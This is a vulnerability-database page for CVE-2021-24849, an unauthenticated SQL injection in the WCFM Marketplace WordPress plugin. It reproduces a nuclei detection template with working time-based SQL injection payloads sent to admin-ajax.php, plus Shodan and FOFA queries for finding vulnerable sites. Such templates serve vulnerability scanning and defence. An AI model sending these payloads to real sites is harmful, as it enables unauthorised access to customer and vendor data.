Lucene search
K

WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 71 Views

WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-24849
21 Dec 202112:29
circl
CNNVD
WordPress SQL注入漏洞
21 Dec 202100:00
cnnvd
CNVD
WordPress WooCommerce Multivendor Marketplace SQL Injection Vulnerability
26 Dec 202100:00
cnvd
CVE
CVE-2021-24849
21 Dec 202108:45
cve
Cvelist
CVE-2021-24849 WCFM - WooCommerce Multivendor Marketplace < 3.4.12 - Unauthenticated SQL Injection
21 Dec 202108:45
cvelist
NVD
CVE-2021-24849
21 Dec 202109:15
nvd
OSV
CVE-2021-24849
21 Dec 202109:15
osv
Patchstack
WordPress WCFM Marketplace plugin <= 3.4.11 - Unauthenticated SQL Injection (SQLi) vulnerability
22 Nov 202100:00
patchstack
Prion
Sql injection
21 Dec 202109:15
prion
RedhatCVE
CVE-2021-24849
22 May 202519:23
redhatcve
Rows per page
id: CVE-2021-24849

info:
  name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
  impact: |
    Unauthenticated attackers can execute SQL injection through multiple unsanitized parameters, potentially gaining access to all WooCommerce marketplace data including customer and vendor information.
  remediation: Fixed in 3.4.12
  reference:
    - https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24849
    - https://wordpress.org/plugins/wc-multivendor-marketplace/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24849
    cwe-id: CWE-89
    epss-score: 0.0848
    epss-percentile: 0.94364
    cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: wclovers
    product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/wc-multivendor-marketplace
    fofa-query: body=/wp-content/plugins/wc-multivendor-marketplace
    publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
  tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce")
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{post_data}}

    payloads:
      post_data:
        - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--"
        - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code == 200'
          - 'contains(header, "application/json")'
          - 'contains(body, "success")'
        condition: and
# digest: 4b0a00483046022100f307c4a64b165b8a9104e929ced1eb2d349df94c583ac690b23e8e91f53c354b0221009320dd645dcb019aa968fe984282c3063184a897e25225747689b55428c4eb0b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.5
CVSS 3.19.8
EPSS0.0848
71